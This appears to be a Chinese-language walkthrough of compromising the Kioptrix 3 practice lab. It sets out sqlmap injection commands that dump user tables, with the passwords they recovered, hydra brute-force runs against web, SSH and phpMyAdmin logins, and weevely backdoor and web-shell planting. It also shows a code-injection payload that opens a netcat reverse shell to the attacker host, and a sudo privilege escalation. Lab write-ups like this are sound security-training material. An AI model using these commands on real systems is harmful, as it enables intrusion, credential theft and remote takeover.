淫漫则不能励精,险躁则不能治性。
上次目录扫描得到数据库登录界面和用户登录界面,普通的字典爆破思路不可取,所以接下来是通过挖掘 web 漏洞得到用户登录的账密。
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1"
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" --current-db
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery --tables
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery -T gallarific_users --columns
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery -T gallarific_users --dump
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery -T dev_accounts --columns
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump
账号 | 密码 |
---|---|
admin | n0t7t1k4 |
dreg | Mast3r |
loneferret | starwars |
hydra -L user.txt -P passwd.txt 10.10.16.153 http-post-form "/index.php?system=Admin&page=loginSubmit:username=^USER^&password=^PASS^:S=logout" -F
hydra -L user.txt -P passwd.txt ssh://10.10.16.153
hydra -L user.txt -P passwd.txt 10.10.16.153 http-post-form "/phpmyadmin:username=^USER^&password=^PASS^:S=logout" -F
grep -r "localhost" /home
sqlmap -d "mysql://root:[email protected]:3306/mysql" --os-shell
参数格式:"mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME" or "access://DATABASE_FILEPATH"
由于网站的根目录没有写入的权限(只有 root 有 w 权限),所以一下三种在网站根目录植入 shell.php 来反弹 shell 的做法发挥不了,不过还是记录下。
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" --is-dba (当前用户要是管理员才能植入)
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" --os-shell
weevely generate 123456 /tmp/shell.php #weevely 生成后门
sqlmap -u "http://10.10.16.153/gallery/gallery.php?id=1" --file-write=/tmp/shell.php --file-dest=/home/www/kioptrix3.com/shell.php
也可以在 phpmyadmin 界面反弹 getshell,前提条件下是知道网站的真实路径和有写入权限
select '' INTO OUTFILE '/home/www/kioptrix3.com/shell.php'
虽然在靶机的网站根目录下普通用户没有写入权限,可以利用上面的方法在 /tmp 目录下写入后门,通过首页的文件包含漏洞 getshell
PS: 使用 weevely 连接的时候,后门地址要使用 00截断 ,不然不能反弹 shell
weevely http://10.10.16.153/index.php?system=../../../../../tmp/shell.php%001 123456
http://10.10.16.153/index.php?page=${@print(system("nc -e /bin/bash 10.10.16.128 4444"))}\
nc -lvnp 4444
loneferret ALL=(ALL) ALL #NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
直接执行 /bin/bash 回车就可以提权,但我这里不行,提示 segmentation fault ,无法保存修改,所以没有效果,不过别人的是可以的。
猪头
2020.3.18